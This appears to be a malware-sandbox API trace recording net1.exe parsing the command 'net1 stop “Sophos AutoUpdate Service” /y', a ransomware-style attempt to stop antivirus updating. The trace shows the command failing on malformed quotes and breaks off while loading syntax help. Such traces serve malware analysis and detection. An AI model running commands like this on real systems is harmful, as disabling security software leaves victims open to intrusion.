0xb9c [0038.308] GetCurrentThreadId () returned 0xba0 [0038.308] GetTickCount () returned 0x1144960 [0038.308] QueryPerformanceCounter (in: lpPerformanceCount=0x34fd40 | out: lpPerformanceCount=0x34fd40*=15859282019) returned 1 [0038.308] GetModuleHandleA (lpModuleName=0x0) returned 0x4b0000 [0038.308] __set_app_type (_Type=0x1) [0038.308] __p__fmode () returned 0x74eb31f4 [0038.308] __p__commode () returned 0x74eb31fc [0038.309] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4bffe6) returned 0x0 [0038.309] __getmainargs (in: _Argc=0x4c9064, _Argv=0x4c906c, _Env=0x4c9068, _DoWildCard=0, _StartInfo=0x4c9024 | out: _Argc=0x4c9064, _Argv=0x4c906c, _Env=0x4c9068) returned 0 [0038.309] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0038.309] GetConsoleOutputCP () returned 0x1b5 [0038.309] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4c9080 | out: lpCPInfo=0x4c9080) returned 1 [0038.309] SetThreadUILanguage (LangId=0x0) returned 0x409 [0038.312] sprintf_s (in: _DstBuf=0x34fd00, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0038.312] setlocale (category=0, locale=".437") returned="English_United States.437" [0038.314] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0038.314] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0038.314] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥ /y" [0038.314] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x34facc, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0038.314] RtlAllocateHeap (HeapHandle=0x800000, Flags=0x0, Size=0x9a) returned 0x813c48 [0038.314] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0038.314] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x34fcd0 | out: Buffer=0x34fcd0*=0x811ca8) returned 0x0 [0038.314] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x34fcd0 | out: Buffer=0x34fcd0*=0x811cc0) returned 0x0 [0038.314] _fileno (_File=0x74eb2900) returned -2 [0038.315] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0038.315] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0038.315] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0038.315] _wcsicmp (_String1="config", _String2="stop") returned -16 [0038.315] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0038.315] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0038.315] _wcsicmp (_String1="file", _String2="stop") returned -13 [0038.315] _wcsicmp (_String1="files", _String2="stop") returned -13 [0038.315] _wcsicmp (_String1="group", _String2="stop") returned -12 [0038.315] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0038.315] _wcsicmp (_String1="help", _String2="stop") returned -11 [0038.315] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0038.315] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0038.315] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0038.315] _wcsicmp (_String1="session", _String2="stop") returned -15 [0038.315] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0038.315] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0038.315] _wcsicmp (_String1="share", _String2="stop") returned -12 [0038.315] _wcsicmp (_String1="start", _String2="stop") returned -14 [0038.315] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0038.315] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0038.315] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0038.315] _wcsicmp (_String1="accounts", _String2="ΓÇ£Sophos") returned -850 [0038.315] _wcsicmp (_String1="computer", _String2="ΓÇ£Sophos") returned -848 [0038.315] _wcsicmp (_String1="config", _String2="ΓÇ£Sophos") returned -848 [0038.315] _wcsicmp (_String1="continue", _String2="ΓÇ£Sophos") returned -848 [0038.315] _wcsicmp (_String1="cont", _String2="ΓÇ£Sophos") returned -848 [0038.315] _wcsicmp (_String1="file", _String2="ΓÇ£Sophos") returned -845 [0038.315] _wcsicmp (_String1="files", _String2="ΓÇ£Sophos") returned -845 [0038.316] _wcsicmp (_String1="group", _String2="ΓÇ£Sophos") returned -844 [0038.316] _wcsicmp (_String1="groups", _String2="ΓÇ£Sophos") returned -844 [0038.316] _wcsicmp (_String1="help", _String2="ΓÇ£Sophos") returned -843 [0038.316] _wcsicmp (_String1="helpmsg", _String2="ΓÇ£Sophos") returned -843 [0038.316] _wcsicmp (_String1="localgroup", _String2="ΓÇ£Sophos") returned -839 [0038.316] _wcsicmp (_String1="pause", _String2="ΓÇ£Sophos") returned -835 [0038.316] _wcsicmp (_String1="session", _String2="ΓÇ£Sophos") returned -832 [0038.316] _wcsicmp (_String1="sessions", _String2="ΓÇ£Sophos") returned -832 [0038.316] _wcsicmp (_String1="sess", _String2="ΓÇ£Sophos") returned -832 [0038.316] _wcsicmp (_String1="share", _String2="ΓÇ£Sophos") returned -832 [0038.316] _wcsicmp (_String1="start", _String2="ΓÇ£Sophos") returned -832 [0038.316] _wcsicmp (_String1="stats", _String2="ΓÇ£Sophos") returned -832 [0038.316] _wcsicmp (_String1="statistics", _String2="ΓÇ£Sophos") returned -832 [0038.316] _wcsicmp (_String1="stop", _String2="ΓÇ£Sophos") returned -832 [0038.316] _wcsicmp (_String1="time", _String2="ΓÇ£Sophos") returned -831 [0038.316] _wcsicmp (_String1="user", _String2="ΓÇ£Sophos") returned -830 [0038.316] _wcsicmp (_String1="users", _String2="ΓÇ£Sophos") returned -830 [0038.316] _wcsicmp (_String1="msg", _String2="ΓÇ£Sophos") returned -838 [0038.316] _wcsicmp (_String1="messenger", _String2="ΓÇ£Sophos") returned -838 [0038.316] _wcsicmp (_String1="receiver", _String2="ΓÇ£Sophos") returned -833 [0038.316] _wcsicmp (_String1="rcv", _String2="ΓÇ£Sophos") returned -833 [0038.316] _wcsicmp (_String1="netpopup", _String2="ΓÇ£Sophos") returned -837 [0038.316] _wcsicmp (_String1="redirector", _String2="ΓÇ£Sophos") returned -833 [0038.316] _wcsicmp (_String1="redir", _String2="ΓÇ£Sophos") returned -833 [0038.316] _wcsicmp (_String1="rdr", _String2="ΓÇ£Sophos") returned -833 [0038.316] _wcsicmp (_String1="workstation", _String2="ΓÇ£Sophos") returned -828 [0038.316] _wcsicmp (_String1="work", _String2="ΓÇ£Sophos") returned -828 [0038.316] _wcsicmp (_String1="wksta", _String2="ΓÇ£Sophos") returned -828 [0038.316] _wcsicmp (_String1="prdr", _String2="ΓÇ£Sophos") returned -835 [0038.316] _wcsicmp (_String1="devrdr", _String2="ΓÇ£Sophos") returned -847 [0038.316] _wcsicmp (_String1="lanmanworkstation", _String2="ΓÇ£Sophos") returned -839 [0038.316] _wcsicmp (_String1="server", _String2="ΓÇ£Sophos") returned -832 [0038.316] _wcsicmp (_String1="svr", _String2="ΓÇ£Sophos") returned -832 [0038.317] _wcsicmp (_String1="srv", _String2="ΓÇ£Sophos") returned -832 [0038.317] _wcsicmp (_String1="lanmanserver", _String2="ΓÇ£Sophos") returned -839 [0038.317] _wcsicmp (_String1="alerter", _String2="ΓÇ£Sophos") returned -850 [0038.317] _wcsicmp (_String1="netlogon", _String2="ΓÇ£Sophos") returned -837 [0038.317] _wcsicmp (_String1="accounts", _String2="AutoUpdate") returned -18 [0038.317] _wcsicmp (_String1="computer", _String2="AutoUpdate") returned 2 [0038.317] _wcsicmp (_String1="config", _String2="AutoUpdate") returned 2 [0038.317] _wcsicmp (_String1="continue", _String2="AutoUpdate") returned 2 [0038.317] _wcsicmp (_String1="cont", _String2="AutoUpdate") returned 2 [0038.317] _wcsicmp (_String1="file", _String2="AutoUpdate") returned 5 [0038.317] _wcsicmp (_String1="files", _String2="AutoUpdate") returned 5 [0038.317] _wcsicmp (_String1="group", _String2="AutoUpdate") returned 6 [0038.317] _wcsicmp (_String1="groups", _String2="AutoUpdate") returned 6 [0038.317] _wcsicmp (_String1="help", _String2="AutoUpdate") returned 7 [0038.317] _wcsicmp (_String1="helpmsg", _String2="AutoUpdate") returned 7 [0038.317] _wcsicmp (_String1="localgroup", _String2="AutoUpdate") returned 11 [0038.317] _wcsicmp (_String1="pause", _String2="AutoUpdate") returned 15 [0038.317] _wcsicmp (_String1="session", _String2="AutoUpdate") returned 18 [0038.317] _wcsicmp (_String1="sessions", _String2="AutoUpdate") returned 18 [0038.317] _wcsicmp (_String1="sess", _String2="AutoUpdate") returned 18 [0038.317] _wcsicmp (_String1="share", _String2="AutoUpdate") returned 18 [0038.317] _wcsicmp (_String1="start", _String2="AutoUpdate") returned 18 [0038.317] _wcsicmp (_String1="stats", _String2="AutoUpdate") returned 18 [0038.317] _wcsicmp (_String1="statistics", _String2="AutoUpdate") returned 18 [0038.317] _wcsicmp (_String1="stop", _String2="AutoUpdate") returned 18 [0038.317] _wcsicmp (_String1="time", _String2="AutoUpdate") returned 19 [0038.317] _wcsicmp (_String1="user", _String2="AutoUpdate") returned 20 [0038.317] _wcsicmp (_String1="users", _String2="AutoUpdate") returned 20 [0038.317] _wcsicmp (_String1="msg", _String2="AutoUpdate") returned 12 [0038.317] _wcsicmp (_String1="messenger", _String2="AutoUpdate") returned 12 [0038.317] _wcsicmp (_String1="receiver", _String2="AutoUpdate") returned 17 [0038.318] _wcsicmp (_String1="rcv", _String2="AutoUpdate") returned 17 [0038.318] _wcsicmp (_String1="netpopup", _String2="AutoUpdate") returned 13 [0038.318] _wcsicmp (_String1="redirector", _String2="AutoUpdate") returned 17 [0038.318] _wcsicmp (_String1="redir", _String2="AutoUpdate") returned 17 [0038.318] _wcsicmp (_String1="rdr", _String2="AutoUpdate") returned 17 [0038.318] _wcsicmp (_String1="workstation", _String2="AutoUpdate") returned 22 [0038.318] _wcsicmp (_String1="work", _String2="AutoUpdate") returned 22 [0038.318] _wcsicmp (_String1="wksta", _String2="AutoUpdate") returned 22 [0038.318] _wcsicmp (_String1="prdr", _String2="AutoUpdate") returned 15 [0038.318] _wcsicmp (_String1="devrdr", _String2="AutoUpdate") returned 3 [0038.318] _wcsicmp (_String1="lanmanworkstation", _String2="AutoUpdate") returned 11 [0038.318] _wcsicmp (_String1="server", _String2="AutoUpdate") returned 18 [0038.318] _wcsicmp (_String1="svr", _String2="AutoUpdate") returned 18 [0038.318] _wcsicmp (_String1="srv", _String2="AutoUpdate") returned 18 [0038.318] _wcsicmp (_String1="lanmanserver", _String2="AutoUpdate") returned 11 [0038.318] _wcsicmp (_String1="alerter", _String2="AutoUpdate") returned -9 [0038.318] _wcsicmp (_String1="netlogon", _String2="AutoUpdate") returned 13 [0038.318] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0038.318] SetThreadUILanguage (LangId=0x0) returned 0x409 [0038.318] wcscpy_s (in: _Destination=0x34f7d0, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0038.318] LoadLibraryW (lpLibFileName="neth.dll") returned 0x73ee0000 [0038.319] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x34f7cc, nSize=0x0, Arguments=0x34f7c8 | out: lpBuffer="噠\x81neth.dll") returned 0xff [0038.320] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0038.320] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0038.320] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0038.320] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0038.320] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0038.321] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0038.321] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0038.321] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0038.321] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0038.321] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0038.321] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.321] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0038.321] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0038.321] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0038.321] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0038.321] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0038.321] _wcsicmp (_String1="CONT", _String2="ΓÇ£Sophos") returned -848 [0038.321] _wcsicmp (_String1="CONT", _String2="AutoUpdate") returned 2 [0038.321] _wcsicmp (_String1="CONT", _String2="ServiceΓÇ¥") returned -16 [0038.321] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.321] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0038.321] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.321] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0038.321] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0038.321] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0038.321] _wcsicmp (_String1="FILES", _String2="ΓÇ£Sophos") returned -845 [0038.321] _wcsicmp (_String1="FILES", _String2="AutoUpdate") returned 5 [0038.321] _wcsicmp (_String1="FILES", _String2="ServiceΓÇ¥") returned -13 [0038.321] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.321] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0038.321] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.321] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0038.321] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0038.321] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0038.321] _wcsicmp (_String1="GROUPS", _String2="ΓÇ£Sophos") returned -844 [0038.321] _wcsicmp (_String1="GROUPS", _String2="AutoUpdate") returned 6 [0038.321] _wcsicmp (_String1="GROUPS", _String2="ServiceΓÇ¥") returned -12 [0038.321] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.322] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0038.322] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.322] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0038.322] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0038.322] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0038.322] _wcsicmp (_String1="REPL", _String2="ΓÇ£Sophos") returned -833 [0038.322] _wcsicmp (_String1="REPL", _String2="AutoUpdate") returned 17 [0038.322] _wcsicmp (_String1="REPL", _String2="ServiceΓÇ¥") returned -1 [0038.322] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0038.322] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0038.322] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0038.322] _wcsicmp (_String1="REPLICATOR", _String2="ΓÇ£Sophos") returned -833 [0038.322] _wcsicmp (_String1="REPLICATOR", _String2="AutoUpdate") returned 17 [0038.322] _wcsicmp (_String1="REPLICATOR", _String2="ServiceΓÇ¥") returned -1 [0038.322] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.322] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0038.322] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.322] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0038.322] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0038.322] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0038.322] _wcsicmp (_String1="SESSIONS", _String2="ΓÇ£Sophos") returned -832 [0038.322] _wcsicmp (_String1="SESSIONS", _String2="AutoUpdate") returned 18 [0038.322] _wcsicmp (_String1="SESSIONS", _String2="ServiceΓÇ¥") returned 1 [0038.322] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0038.322] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0038.322] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0038.322] _wcsicmp (_String1="SESS", _String2="ΓÇ£Sophos") returned -832 [0038.322] _wcsicmp (_String1="SESS", _String2="AutoUpdate") returned 18 [0038.322] _wcsicmp (_String1="SESS", _String2="ServiceΓÇ¥") returned 1 [0038.322] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.322] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0038.322] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.322] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0038.322] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0038.322] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0038.323] _wcsicmp (_String1="STATS", _String2="ΓÇ£Sophos") returned -832 [0038.323] _wcsicmp (_String1="STATS", _String2="AutoUpdate") returned 18 [0038.323] _wcsicmp (_String1="STATS", _String2="ServiceΓÇ¥") returned 15 [0038.323] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.323] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0038.323] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.323] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0038.323] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0038.323] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0038.323] _wcsicmp (_String1="USERS", _String2="ΓÇ£Sophos") returned -830 [0038.323] _wcsicmp (_String1="USERS", _String2="AutoUpdate") returned 20 [0038.323] _wcsicmp (_String1="USERS", _String2="ServiceΓÇ¥") returned 2 [0038.323] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.323] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0038.323] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.323] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0038.323] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0038.323] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0038.323] _wcsicmp (_String1="REDIRECTOR", _String2="ΓÇ£Sophos") returned -833 [0038.323] _wcsicmp (_String1="REDIRECTOR", _String2="AutoUpdate") returned 17 [0038.323] _wcsicmp (_String1="REDIRECTOR", _String2="ServiceΓÇ¥") returned -1 [0038.323] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0038.323] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0038.323] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0038.323] _wcsicmp (_String1="REDIR", _String2="ΓÇ£Sophos") returned -833 [0038.323] _wcsicmp (_String1="REDIR", _String2="AutoUpdate") returned 17 [0038.323] _wcsicmp (_String1="REDIR", _String2="ServiceΓÇ¥") returned -1 [0038.323] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0038.323] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0038.323] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0038.323] _wcsicmp (_String1="RDR", _String2="ΓÇ£Sophos") returned -833 [0038.323] _wcsicmp (_String1="RDR", _String2="AutoUpdate") returned 17 [0038.323] _wcsicmp (_String1="RDR", _String2="ServiceΓÇ¥") returned -1 [0038.324] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0038.324] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0038.324] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0038.324] _wcsicmp (_String1="WORK", _String2="ΓÇ£Sophos") returned -828 [0038.324] _wcsicmp (_String1="WORK", _String2="AutoUpdate") returned 22 [0038.324] _wcsicmp (_String1="WORK", _String2="ServiceΓÇ¥") returned 4 [0038.324] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0038.324] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0038.324] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0038.324] _wcsicmp (_String1="WKSTA", _String2="ΓÇ£Sophos") returned -828 [0038.324] _wcsicmp (_String1="WKSTA", _String2="AutoUpdate") returned 22 [0038.324] _wcsicmp (_String1="WKSTA", _String2="ServiceΓÇ¥") returned 4 [0038.324] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0038.324] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0038.324] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0038.324] _wcsicmp (_String1="PRDR", _String2="ΓÇ£Sophos") returned -835 [0038.324] _wcsicmp (_String1="PRDR", _String2="AutoUpdate") returned 15 [0038.324] _wcsicmp (_String1="PRDR", _String2="ServiceΓÇ¥") returned -3 [0038.324] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0038.324] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0038.324] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0038.324] _wcsicmp (_String1="DEVRDR", _String2="ΓÇ£Sophos") returned -847 [0038.324] _wcsicmp (_String1="DEVRDR", _String2="AutoUpdate") returned 3 [0038.324] _wcsicmp (_String1="DEVRDR", _String2="ServiceΓÇ¥") returned -15 [0038.324] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.324] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0038.324] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.324] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0038.324] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0038.324] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0038.324] _wcsicmp (_String1="SVR", _String2="ΓÇ£Sophos") returned -832 [0038.324] _wcsicmp (_String1="SVR", _String2="AutoUpdate") returned 18 [0038.324] _wcsicmp (_String1="SVR", _String2="ServiceΓÇ¥") returned 17 [0038.324] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0038.324] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.325] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0038.325] _wcsicmp (_String1="SRV", _String2="ΓÇ£Sophos") returned -832 [0038.325] _wcsicmp (_String1="SRV", _String2="AutoUpdate") returned 18 [0038.325] _wcsicmp (_String1="SRV", _String2="ServiceΓÇ¥") returned 13 [0038.325] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.325] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x34f7cc, nSize=0x0, Arguments=0x34f7c8 | out: lpBuffer="㼰\x81ꔺ瓡") returned 0x1c [0038.325] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0038.325] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0038.325] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0038.325] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0038.325] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.325] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0038.325] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0038.325] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.325] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0038.325] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.325] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0038.325] wcscpy_s (in: _Destination=0x4ca4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0038.325] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ef0000 [0038.326] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ef0000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x4cb338, nSize=0x800, Arguments=0x4c9dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0038.326] GetFileType (hFile=0x26c) returned 0x3 [0038.326] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x814200 [0038.326] WideCharToMultiByte (in: 